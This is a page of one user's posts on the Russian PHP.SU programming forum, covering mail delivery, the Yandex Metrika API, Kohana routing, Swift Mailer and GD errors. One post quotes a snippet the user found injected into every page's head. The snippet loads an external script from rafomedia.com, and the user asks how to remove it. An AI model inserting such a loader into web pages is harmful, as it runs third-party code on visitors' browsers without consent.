PHP.SU

Программирование на PHP, MySQL и другие веб-технологии
PHP.SU Портал     На главную страницу форума Главная     Помощь Помощь     Поиск Поиск     Поиск Яндекс Поиск Яндекс     Вакансии  Пользователи Пользователи

Страниц (7): [1] 2 3 4 5 6 7 »

> Найдено сообщений: 96
ADIOS Отправлено: 03 Марта, 2017 - 10:34:41 • Тема: Исходящая почта с сайта • Форум: Работа с сетью

Ответов: 2
Просмотров: 924
Всем привет..

С толкнулся с такой проблемкой..

На сайте есть форма в которой пользователь вводит свой email и от его имени отправляется письмо к n-ому адресату. Все хорошо если у пользователя почта яндексе, gmail.. А вот если его почта на серверах mail.ru, то письма до адресатов не доходят, хотя сервер сайта возвращает true...

На просторах интернета нашел вот это https://habrahabr[dot]ru/company/mailru/blog/282602/ , не знаю может в этом и есть проблема...

Если возможность как-то решить эту проблему?
ADIOS Отправлено: 19 Декабря, 2016 - 19:39:59 • Тема: Помогите составить алгоритм скрипта • Форум: Напишите за меня, пожалуйста

Ответов: 0
Просмотров: 36
Всем привет!!!

О ВЕЛИКИЕ ГУРУ сея форума, помогите разобраться и составить алгоритм скрипта ротатора новостей, который очень классно реализован на сайте rbc.ru.
ADIOS Отправлено: 18 Ноября, 2016 - 17:16:17 • Тема: Доступ к счетчику Я.Метрики через API • Форум: Программирование на PHP

Ответов: 0
Просмотров: 915
Мне доверили счетчик с правами "Только просмотр" и есть токен от владельца счетчика.

Через API Метрики отправляю запрос к данным, а в ответ получаю Access is denied.

Когда "Публичный доступ к статистике" у счетчика открыт, данные приходят.

Обязательно ли этот публичный доступ должен быть открыт?

Если нет, то как получить данные?
ADIOS Отправлено: 03 Ноября, 2016 - 16:17:48 • Тема: Установка Laravel • Форум: CMS и фреймворки

Ответов: 2
Просмотров: 812
Подскажите люди добрые как установить Larevel поэтапно, для нуба
ADIOS Отправлено: 23 Апреля, 2016 - 05:35:11 • Тема: KO3 и Swift Mailer • Форум: CMS и фреймворки

Ответов: 7
Просмотров: 1503
LIME пишет:
Учился на рубеже века
Есть старший брат
Блондин
Татарин
Это все)


Ну значит ему около 40.

Попробуй в одноклассниках поискать или вконтакте...
ADIOS Отправлено: 22 Апреля, 2016 - 23:25:36 • Тема: KO3 и Swift Mailer • Форум: CMS и фреймворки

Ответов: 7
Просмотров: 1503
LIME пишет:
Это клиент
Тут либо логировать письма и работать с логами либо делать свой почтовый сервак и отправлять через него
Проще первое


Т.е. все равно велосипед писать придется...

LIME пишет:

найди мне Руслана из НавоиУлыбка
Учился в горном универе в Москве работал в ресторане ДианаУлыбка


Фамилия? год рождения? У нас тут Русланов мноооогооо))))
ADIOS Отправлено: 22 Апреля, 2016 - 00:27:51 • Тема: KO3 и Swift Mailer • Форум: CMS и фреймворки

Ответов: 7
Просмотров: 1503
LIME пишет:

ADIOS пишет:
Откуда: Узбекистан, Навои
привет Руслану(Москва, ресторан "Диана")

в доках swift mailer все есть
в чем конкретно затык?
что пробовал и что не получается?


Через swift я отправляю почту, рассылки и т.п. Но собирает ли он ее (почту) с сервера? Если собирает, то как? Какие используется методы и т.п.?

Вообщем мне в админке надо сделать небольшой почтовый клиент...

На оф сайте, как то скромненько все изложено
ADIOS Отправлено: 21 Апреля, 2016 - 07:04:25 • Тема: KO3 и Swift Mailer • Форум: CMS и фреймворки

Ответов: 7
Просмотров: 1503
Всем привет!

Сайт написан на ko3 и появилась необходимость сделать почтовый клиент, который бы собирал почту с локального сервера, для этого есть специальный модуль email со встроенным swift mailer. Вот только как с ним работать, какие функции и методы он поддерживает?
ADIOS Отправлено: 29 Октября, 2015 - 07:17:45 • Тема: Ошибка с GD библиотекой • Форум: Графика в PHP

Ответов: 1
Просмотров: 1103
This method requires image layer effect, which is only available in the bundled version of GD..
Подскажите, что эта за ошибка и как ее исправить?
ADIOS Отправлено: 18 Августа, 2015 - 18:45:54 • Тема: не приходят данные в ajax запрос • Форум: JavaScript & VBScript

Ответов: 7
Просмотров: 1838
ADIOS Отправлено: 28 Мая, 2015 - 07:46:38 • Тема: Посторонний код на странице... • Форум: JavaScript & VBScript

Ответов: 2
Просмотров: 1923
Всем привет! Сегодня решил просмотреть исходный код через chrome и обнаружил следующее:

CODE (javascript):
скопировать код в буфер обмена
  1. <script type="text/javascript">
  2. (function(){var a=document.createElement("script");a.type="text/javascript";a.async=!0;a.src="http://img.rafomedia.com/zr/js/adr.js?vfsj";var b=document.getElementsByTagName("script")[0];b.parentNode.insertBefore(a,b);})();
  3. </script>


Причем эта зараза вставляется во все страницы между тегом head, во всех браузерах. Что это? И как от этого избавиться?
ADIOS Отправлено: 04 Октября, 2014 - 20:20:50 • Тема: Помощь с кодом!! • Форум: Вопросы новичков

Ответов: 7
Просмотров: 372


Данное условие выдаст следующие

Fatal error: Can't use function return value in write context in ...

PHP:
скопировать код в буфер обмена
  1. $login_strana = trim($_POST['login_strana']);
  2. if (empty($login_strana)) ...


Попробуйте так
ADIOS Отправлено: 13 Января, 2014 - 07:08:34 • Тема: День недели по дате • Форум: Вопросы новичков

Ответов: 3
Просмотров: 199
функция getDay($year,$mon,$day) требует три параметра $year, $mon и $day...

а ты отравляешь всего один $var, получается так getDay("2011,12,27",NULL,NULL)...
ADIOS Отправлено: 13 Января, 2014 - 06:18:43 • Тема: Kohana роутинг и kohana-multilang • Форум: CMS и фреймворки

Ответов: 2
Просмотров: 1785
в месте с фреймворком в архиве файл example.htaccess
переименовал в .htaccess

переключение языков заработало... как ни странно..

содержимое .htaccess

CODE (htmlphp):
скопировать код в буфер обмена
  1.  
  2. # Turn on URL rewriting
  3. RewriteEngine On
  4.  
  5.  
  6. # Installation directory
  7. RewriteBase /
  8.  
  9.  
  10. # Protect hidden files from being viewed
  11. <Files .*>
  12.         Order Deny,Allow
  13.         Deny From All
  14. </Files>
  15.  
  16.  
  17. # Protect application and system files from being viewed
  18. RewriteRule ^(?:application|modules|system)\b.* index.php/$0 [L]
  19.  
  20.  
  21. # Allow any files or directories that exist to be displayed directly
  22. RewriteCond %{REQUEST_FILENAME} !-f
  23. RewriteCond
  24.  
  25. %{REQUEST_FILENAME} !-d
  26.  
  27.  
  28. # Rewrite all other URLs to index.php/URL
  29. RewriteRule .* index.php/$0 [PT]
  30.  
  31.  
ADIOS Отправлено: 12 Января, 2014 - 07:28:28 • Тема: Kohana роутинг и kohana-multilang • Форум: CMS и фреймворки

Ответов: 2
Просмотров: 1785
Все привет!

Появилась необходимость сделать сайт мультиязычным на гитхабе нашел не плохой модуль
kohana-multilang, и все бы как хорошо, но проблема с роутингом.. Не могу его никак настроить..

Код роутинга
PHP:
скопировать код в буфер обмена
  1.  
  2.         $languages = array();
  3.         $lang_param = '<lang>(/<uri>(/<action>(/<id>)))';
  4.        
  5.         $config = Kohana::$config->load('multilang');
  6.        
  7.        
  8.         // Need a regex for all the available languages
  9.         foreach($config->languages as $lang => $settings)
  10.         {
  11.                 // If we hide the default language, we make lang parameter optional
  12.                 if($config->hide_default && $config->default == $lang)
  13.                 {
  14.                         $lang_param = '(<lang>(/<uri>(/<action>(/<id>))))';
  15.                 }
  16.                 else
  17.                 {
  18.                         $languages[] = $lang;
  19.                 }
  20.         }
  21.  
  22. /**
  23.  * Set the routes. Each route must have a minimum of a name, a URI and a set of
  24.  * defaults for the URI.
  25.  */
  26. Route::set('default', $lang_param, array(
  27.         'lang'  =>  implode('|', $languages),
  28.         'uri' => '.*'
  29. ))
  30. ->defaults(array(
  31.     'controller'        => 'page',  
  32.         'lang'                  => $config->default,  
  33. ));
  34.  


Файл конфигурации есть здесь

Вообщем если скрывать язык по умолчанию (http://site.ru/) то главная страница работает меняем язык так http://site[dot]ru/en/ получаем Error 404

Помогите плиз почти неделю мучаюсь с роутом

Страниц (7): [1] 2 3 4 5 6 7 »
Powered by PHP  Powered By MySQL  Powered by Nginx  Valid CSS  RSS

 
Powered by ExBB FM 1.0 RC1. InvisionExBB